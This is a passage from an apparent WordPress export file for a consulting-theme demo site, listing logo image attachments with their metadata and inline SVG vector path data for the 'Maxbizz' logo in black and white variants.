<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-5/05_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:43:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>389</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:43:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:43:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>267</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/05_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="4.025560e-07" style="stop-color:#CAF7F1"></stop>
	<stop offset="1" style="stop-color:#74C7BC"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_footer_builders/footer-1/01_white/</link>
		<pubDate>Fri, 04 Sep 2020 03:40:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>404</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 03:40:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 03:40:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="0" style="stop-color:#FFD797"></stop>
	<stop offset="1" style="stop-color:#FF8523"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
